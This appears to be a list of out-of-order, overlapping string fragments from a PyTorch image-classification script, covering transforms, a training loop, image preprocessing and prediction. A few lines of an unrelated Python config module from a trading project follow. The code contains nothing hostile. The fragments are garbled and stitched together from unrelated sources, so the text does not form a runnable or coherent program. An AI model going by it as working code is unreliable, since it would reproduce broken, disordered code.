"-1 for epoch in range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects",
"'test': transforms.Compose([ transforms.Resize((224, 224)), transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets =",
"= images.to(device) logps = model(images) ps = torch.exp(logps) # Top indices _, top_indices",
"= { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]),",
"\\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete",
"- 224) / 2 right_margin = left_margin + 224 top_margin = bottom_margin +",
"inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1",
"top_classes = [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names) for i, img_name",
"Loss function :param optimizer: Optimizer :param num_epochs: Number of epochs :param dataloaders: Dataloaders,",
"Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path: Path of image",
"if torch.cuda.is_available() else \"cpu\") # Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders=",
"model(inputs) _, preds = torch.max(out, 1) # out = torch.mul(out,100) loss = criterion(out,",
"enumerate(dataloader, start=1): if print_progress: if ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader)))",
"* running_corrects / len_val1} %') if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch",
"if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad(): for ii,",
"'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth']",
"of image to be processed :returns processed numpy array Scales, crops, and normalizes",
"file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device)",
"shuffle=False) # Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val:",
"running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) /",
"print_progress: prints progress if true :return: trained model object \"\"\" min_val_loss = np.Inf",
"normalizes a PIL image for a PyTorch model, returns a Numpy array \"\"\"",
"# linear algebra import pandas as pd # data processing, CSV file I/O",
"60, time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects / len_val1} %') if",
"defined in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) #",
":param optimizer: Optimizer :param num_epochs: Number of epochs :param dataloaders: Dataloaders, must be",
"= model(images) ps = torch.exp(logps) # Top indices _, top_indices = ps.topk(1) top_indices",
"% 60)) print(f'Accuracy : {100 * running_corrects / len_val1} %') if valid_loss <",
"model object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch",
"= config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],",
"import seaborn as sns import torch.nn as nn from torch.utils.data import Dataset, DataLoader",
"import Dataset, DataLoader import torchvision.transforms as transforms from torchvision import datasets,models import math",
"from utils import * data_dir = '.' test_path = os.path.join(data_dir, 'test') sample_sub =",
"be processed :returns processed numpy array Scales, crops, and normalizes a PIL image",
"(img - mean) / std return img # Load test dataset from class",
"x in ['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else",
"Scales, crops, and normalizes a PIL image for a PyTorch model, returns a",
"/ 2 right_margin = left_margin + 224 top_margin = bottom_margin + 224 img",
"for ii, (images, _, img_names) in enumerate(dataloader, start=1): if print_progress: if ii %",
"and normalizes a PIL image for a PyTorch model, returns a Numpy array",
"= labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out, 1) # out",
"- 224) / 2 bottom_margin = (img.height - 224) / 2 right_margin =",
"= labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out,",
"torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) #",
"if True :return: Prediction(as a list) on test folder defined by config file",
"sns import torch.nn as nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms as",
"/ len_val1} %') if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch = epoch",
":param dataloaders: Dataloaders, must be a dictionary having train and val as keys",
"os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) #",
"model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] #",
"output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects",
"= epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best",
"print_progress: Prints progress if True :return: Prediction(as a list) on test folder defined",
"import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv) import",
"Optimizer :param num_epochs: Number of epochs :param dataloaders: Dataloaders, must be a dictionary",
"in utils test_dataset = TestDataset(data_dir+'test', sample_sub,data_transforms['test']) test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load",
"= 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs =",
"image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val in class_to_idx.items()} def predict(model_path, dataloader,",
"'%', end='\\r') else: print() with torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']):",
"preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss",
"for a PyTorch model, returns a Numpy array \"\"\" img = Image.open(img_path) #",
"import math import torch.optim as optim from torch.optim import lr_scheduler import copy import",
"numpy array Scales, crops, and normalizes a PIL image for a PyTorch model,",
"torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad(): for ii, (images,",
"= labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1, 1) # output1 =",
"= top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes = [idx_to_class[idx[0]] for idx in",
"{x: len(image_datasets[x]) for x in ['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\"",
"train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize",
"dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val in class_to_idx.items()}",
"= yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth = config_dict['model_pth'] train_data =",
"criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects += torch.sum(preds",
"0.406]) # provided mean std = np.array([0.229, 0.224, 0.225]) # provided std img",
"+= loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data) print( f'Epoch: {epoch}\\t{100 *",
"= Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000))",
"I/O (e.g. pd.read_csv) import os import torch import torchvision import matplotlib.pyplot as plt",
"time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))",
"10000)) # Crop Image left_margin = (img.width - 224) / 2 bottom_margin =",
"224) / 2 right_margin = left_margin + 224 top_margin = bottom_margin + 224",
"+ 1) / len(dataloaders['train']):.2f}\" + '%', end='\\r') else: print() with torch.no_grad(): model.eval() for",
"Image left_margin = (img.width - 224) / 2 bottom_margin = (img.height - 224)",
"valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed:",
"config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485,",
"image to be processed :returns processed numpy array Scales, crops, and normalizes a",
"enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long)",
"train_loss = train_loss / len_train1 valid_loss = valid_loss / len_val1 if print_progress: print(",
"// 60, time_elapsed % 60)) print(f'Accuracy : {100 * running_corrects / len_val1} %')",
"labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out, 1)",
"Prints progress if True :return: Prediction(as a list) on test folder defined by",
"data_transforms = { 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize",
"val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def",
"loss = criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 ==",
"= open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth",
"0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float)",
"os import torch import torchvision import matplotlib.pyplot as plt import seaborn as sns",
"Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']}",
"len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss /",
"Crop Image left_margin = (img.width - 224) / 2 bottom_margin = (img.height -",
"import matplotlib.pyplot as plt import seaborn as sns import torch.nn as nn from",
"= 0.0 train_loss = 0.0 model.train() running_corrects = 0 for iter1, (inputs, labels)",
"model.train() running_corrects = 0 for iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device)",
"# Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop",
"inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 *",
"labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects += torch.sum(preds ==",
"config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data']",
"# provided mean std = np.array([0.229, 0.224, 0.225]) # provided std img =",
"= inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _,",
"if print_progress: if ii % 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images =",
"+ '%', end='\\r') else: print() with torch.no_grad(): model.eval() for iter2, (inputs, labels) in",
"Path of image to be processed :returns processed numpy array Scales, crops, and",
"a PyTorch model, returns a Numpy array \"\"\" img = Image.open(img_path) # Resize",
"min_val_loss = valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss)))",
"img = np.array(img) / 255 mean = np.array([0.485, 0.456, 0.406]) # provided mean",
"(img.width - 224) / 2 bottom_margin = (img.height - 224) / 2 right_margin",
"{100 * running_corrects / len_val1} %') if valid_loss < min_val_loss: min_val_loss = valid_loss",
"{epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model def process_image(img_path): \"\"\" :param img_path: Path",
"PyTorch model, returns a Numpy array \"\"\" img = Image.open(img_path) # Resize if",
"Path of Model used for prediction :param dataloader: Test DataLoader :param print_progress: Prints",
"by config file \"\"\" model = torch.load(model_path) device = torch.device(\"cuda\" if torch.cuda.is_available() else",
"_, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes",
"# out = torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item()",
"= os.path.join(data_dir, 'test') sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x))",
"- mean) / std return img # Load test dataset from class defined",
"complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy : {100 *",
"import time from PIL import Image from datetime import datetime from utils import",
"# Get configs from config file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream)",
"Numpy array \"\"\" img = Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000,",
"open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size = config_dict['batch_size'] learning_rate = config_dict['lr'] model_pth =",
"]), } # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x",
"provided std img = (img - mean) / std return img # Load",
"['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']} class_names =",
"% 5 == 0: print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images)",
"# Convert indices to classes top_classes = [idx_to_class[idx[0]] for idx in top_indices] #",
"datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size,",
"print( f'\\nEpoch: {epoch + 1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed =",
"val as keys :param print_progress: prints progress if true :return: trained model object",
"processed :returns processed numpy array Scales, crops, and normalizes a PIL image for",
"copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return",
"transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400,",
"in ['train', 'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")",
"= np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1 for epoch",
"= torch.exp(logps) # Top indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() #",
"= [idx_to_class[idx[0]] for idx in top_indices] # print(\"Img:\" ,img_names) for i, img_name in",
"pd # data processing, CSV file I/O (e.g. pd.read_csv) import os import torch",
"keys :param print_progress: prints progress if true :return: trained model object \"\"\" min_val_loss",
"= criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects +=",
"normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms = { 'train': transforms.Compose([",
"labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device)",
"idx in top_indices] # print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name] =",
"= inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1 =",
"in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device) labels =",
"DataLoader :param print_progress: Prints progress if True :return: Prediction(as a list) on test",
"sample_sub = pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs",
"Prediction(as a list) on test folder defined by config file \"\"\" model =",
"sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from config file stream = open(\"config.yaml\",",
"end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss = train_loss / len_train1 valid_loss",
"x)) # Get configs from config file stream = open(\"config.yaml\", 'r') config_dict =",
"config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229,",
":param criterion: Loss function :param optimizer: Optimizer :param num_epochs: Number of epochs :param",
"img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image left_margin =",
"predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path of Model used for prediction :param",
"} # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in",
"transforms from torchvision import datasets,models import math import torch.optim as optim from torch.optim",
"labels = labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1,",
"img_path: Path of image to be processed :returns processed numpy array Scales, crops,",
"= left_margin + 224 top_margin = bottom_margin + 224 img = img.crop((left_margin, bottom_margin,",
"model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float)",
"{x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],",
"Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for key,",
"image for a PyTorch model, returns a Numpy array \"\"\" img = Image.open(img_path)",
"train_loss += loss.item() * inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if print_progress:",
"pd.read_csv(os.path.join(data_dir, 'sample_submission.csv')) sample_sub['path'] = sample_sub['file_name'].apply(lambda x: os.path.join(test_path, x)) # Get configs from config",
"'valid']} class_names = image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains",
"range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects = 0 for iter1,",
"dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x]) for x in ['train', 'valid']} dataloaders",
"CSV file I/O (e.g. pd.read_csv) import os import torch import torchvision import matplotlib.pyplot",
"Model used for prediction :param dataloader: Test DataLoader :param print_progress: Prints progress if",
"running_corrects / len_val1} %') if valid_loss < min_val_loss: min_val_loss = valid_loss best_epoch =",
"= train_loss / len_train1 valid_loss = valid_loss / len_val1 if print_progress: print( f'\\nEpoch:",
"true :return: trained model object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since",
"dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']} class_names = image_datasets['train'].classes device",
",img_names) for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i] print('\\nPrediction Generation Completed') return",
"out = torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() *",
":return: trained model object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since =",
"img = (img - mean) / std return img # Load test dataset",
"for key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False): \"\"\" :param model_path: Path",
"idx_to_class = {val: key for key, val in class_to_idx.items()} def predict(model_path, dataloader, print_progress=False):",
"be a dictionary having train and val as keys :param print_progress: prints progress",
"labels.data) print( f'Epoch: {epoch}\\t{100 * (iter2 + 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1",
"\"\"\" img = Image.open(img_path) # Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else:",
"dataloader: Test DataLoader :param print_progress: Prints progress if True :return: Prediction(as a list)",
"processed numpy array Scales, crops, and normalizes a PIL image for a PyTorch",
"for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i] print('\\nPrediction Generation Completed') return predictions",
"for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels",
"{ 'train': transforms.Compose([ transforms.Resize((230, 230)), transforms.RandomRotation(30,), transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid':",
"a dictionary having train and val as keys :param print_progress: prints progress if",
"torch.exp(logps) # Top indices _, top_indices = ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert",
"labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100 * (iter1 + 1) / len(dataloaders['train']):.2f}\" +",
"matplotlib.pyplot as plt import seaborn as sns import torch.nn as nn from torch.utils.data",
"= config_dict['lr'] model_pth = config_dict['model_pth'] train_data = config_dict['train_data'] valid_data = config_dict['valid_data'] test_data =",
"['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0) for x in",
"optimizer: Optimizer :param num_epochs: Number of epochs :param dataloaders: Dataloaders, must be a",
"x in ['train', 'valid']} dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'valid']}",
"type object :param criterion: Loss function :param optimizer: Optimizer :param num_epochs: Number of",
"= config_dict['train_data'] valid_data = config_dict['valid_data'] test_data = config_dict['test_data'] # Apply transforms normalize =",
"transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(), normalize",
"= torch.max(output1, 1) # output1 = torch.mul(output1,100).to(device) loss = criterion(output1, labels) valid_loss +=",
"as nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms from torchvision",
"* inputs.size(0) # running_corrects += torch.sum(preds == labels.data) if print_progress: print( f\"Epoch: {epoch}\\t{100",
"\"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict()) since = time.time() best_epoch = -1",
"from PIL import Image from datetime import datetime from utils import * data_dir",
"from torchvision import datasets,models import math import torch.optim as optim from torch.optim import",
"(inputs, labels) in enumerate(dataloaders['valid']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels = labels.to(device)",
"img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img) / 255",
"print('Batch {}/{}'.format(ii, len(dataloader))) images = images.to(device) logps = model(images) ps = torch.exp(logps) #",
"print(\"Img:\" ,img_names) for i, img_name in enumerate(img_names): predictions[img_name] = top_classes[i] print('\\nPrediction Generation Completed')",
"torch.utils.data.DataLoader(test_dataset, batch_size=batch_size, shuffle=False) # Load Class to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class",
"epoch in range(num_epochs): valid_loss = 0.0 train_loss = 0.0 model.train() running_corrects = 0",
"if true :return: trained model object \"\"\" min_val_loss = np.Inf best_model_wts = copy.deepcopy(model.state_dict())",
"import torchvision import matplotlib.pyplot as plt import seaborn as sns import torch.nn as",
"= inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _, preds1",
"= model(inputs) _, preds = torch.max(out, 1) # out = torch.mul(out,100) loss =",
"x: os.path.join(test_path, x)) # Get configs from config file stream = open(\"config.yaml\", 'r')",
"= valid_loss best_epoch = epoch best_model_wts = copy.deepcopy(model.state_dict()) print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch",
"= criterion(output1, labels) valid_loss += loss.item() * inputs.size(0) running_corrects += torch.sum(preds1 == labels.data)",
"model, returns a Numpy array \"\"\" img = Image.open(img_path) # Resize if img.size[0]",
"time.time() best_epoch = -1 for epoch in range(num_epochs): valid_loss = 0.0 train_loss =",
"Resize if img.size[0] > img.size[1]: img.thumbnail((10000, 256)) else: img.thumbnail((256, 10000)) # Crop Image",
"loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0) # running_corrects += torch.sum(preds == labels.data)",
"labels.type(torch.long) optimizer.zero_grad() out = model(inputs) _, preds = torch.max(out, 1) # out =",
"configs from config file stream = open(\"config.yaml\", 'r') config_dict = yaml.safe_load(stream) batch_size =",
"transforms.ToTensor(), normalize ]), } # Load dataloaders image_datasets = {x: datasets.ImageFolder(os.path.join(data_dir, x), data_transforms[x])",
"and val as keys :param print_progress: prints progress if true :return: trained model",
"img.thumbnail((256, 10000)) # Crop Image left_margin = (img.width - 224) / 2 bottom_margin",
"= image_datasets['train'].classes device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") # Trains Model def",
"Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model",
"best_epoch = -1 for epoch in range(num_epochs): valid_loss = 0.0 train_loss = 0.0",
"os.path.join(test_path, x)) # Get configs from config file stream = open(\"config.yaml\", 'r') config_dict",
"mean) / std return img # Load test dataset from class defined in",
"= torch.mul(out,100) loss = criterion(out, labels) loss.backward() optimizer.step() train_loss += loss.item() * inputs.size(0)",
"= config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])",
"1} \\tTraining Loss: {math.sqrt(train_loss):.4f} \\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training",
"\\tValidation Loss: {math.sqrt(valid_loss):.4f}') time_elapsed = time.time() - since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed",
"valid_loss = valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch + 1} \\tTraining",
"nn from torch.utils.data import Dataset, DataLoader import torchvision.transforms as transforms from torchvision import",
"+ 1) / len(dataloaders[\"valid\"]):.2f} %', end='\\r') len_train1 = 6552 len_val1 = len(dataloaders['valid'].dataset) train_loss",
"inputs = inputs.type(torch.float) labels = labels.to(device) labels = labels.type(torch.long) optimizer.zero_grad() out = model(inputs)",
":param model: Model type object :param criterion: Loss function :param optimizer: Optimizer :param",
"transforms.RandomCrop(224), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.ToTensor(), normalize ]), 'valid': transforms.Compose([ transforms.Resize((400, 400)), transforms.CenterCrop((224, 224)), transforms.ToTensor(),",
"num_epochs: Number of epochs :param dataloaders: Dataloaders, must be a dictionary having train",
"predictions = {} with torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader, start=1):",
"# Trains Model def train_model2(model, criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param",
"= torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\") model.to(device) model.eval() predictions = {} with torch.no_grad():",
"np.array([0.229, 0.224, 0.225]) # provided std img = (img - mean) / std",
"criterion, optimizer, num_epochs=3, dataloaders= dataloaders, print_progress=False): \"\"\" :param model: Model type object :param",
"iter1, (inputs, labels) in enumerate(dataloaders['train']): inputs = inputs.to(device) inputs = inputs.type(torch.float) labels =",
"to idx dictionary class_to_idx = image_datasets['valid'].class_to_idx idx_to_class = {val: key for key, val",
"labels.to(device) labels = labels.type(torch.long) output1 = model(inputs) _, preds1 = torch.max(output1, 1) #",
"import torch.optim as optim from torch.optim import lr_scheduler import copy import time from",
"print('Best val Loss: {:4f}'.format(math.sqrt(min_val_loss))) print(f'Epoch completed: {epoch+1}') print(f'Best Epoch: {best_epoch+1}') model.load_state_dict(best_model_wts) return model",
"config_dict['test_data'] # Apply transforms normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) data_transforms",
"/ len_train1 valid_loss = valid_loss / len_val1 if print_progress: print( f'\\nEpoch: {epoch +",
"else: print() with torch.no_grad(): model.eval() for iter2, (inputs, labels) in enumerate(dataloaders['valid']): inputs =",
"returns a Numpy array \"\"\" img = Image.open(img_path) # Resize if img.size[0] >",
"2 right_margin = left_margin + 224 top_margin = bottom_margin + 224 img =",
"+ 224 img = img.crop((left_margin, bottom_margin, right_margin, top_margin)) # Normalize img = np.array(img)",
"since print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60)) print(f'Accuracy :",
"with torch.no_grad(): for ii, (images, _, img_names) in enumerate(dataloader, start=1): if print_progress: if",
"import torchvision.transforms as transforms from torchvision import datasets,models import math import torch.optim as",
"Test DataLoader :param print_progress: Prints progress if True :return: Prediction(as a list) on",
"= ps.topk(1) top_indices = top_indices.detach().cpu().numpy().tolist() # Convert indices to classes top_classes = [idx_to_class[idx[0]]",
"torchvision.transforms as transforms from torchvision import datasets,models import math import torch.optim as optim",
"for x in ['train', 'valid']} dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=batch_size, shuffle= True, num_workers=0)",
"process_image(img_path): \"\"\" :param img_path: Path of image to be processed :returns processed numpy"
] |
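Nothing in the script shows a model being constructed or the two entry points being wired together. The sketch below is one plausible driver, assuming the definitions above are in scope; the ResNet-18 backbone, CrossEntropyLoss, Adam optimizer, and whole-model torch.save are illustrative assumptions, not taken from the script.

# Hypothetical driver; backbone, loss, optimizer, and save format are assumptions.
model = models.resnet18(pretrained=True)
model.fc = nn.Linear(model.fc.in_features, len(class_names))  # match dataset classes
model = model.to(device)

criterion = nn.CrossEntropyLoss()
optimizer = optim.Adam(model.parameters(), lr=lr)

model = train_model2(model, criterion, optimizer, num_epochs=5,
                     dataloaders=dataloaders, print_progress=True)

# Saving the whole model (not just a state_dict) matches the
# torch.load(model_path) call inside predict().
torch.save(model, model_pth)
predictions = predict(model_pth, test_loader, print_progress=True)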
# Arbitrage_Spot/dquant/config.py
import collections
import logging
from configparser import ConfigParser
from pprint import pprint
import os

from dquant.constants import Constants
from dquant.util import Util

# logging.basicConfig(level=logging.INFO)
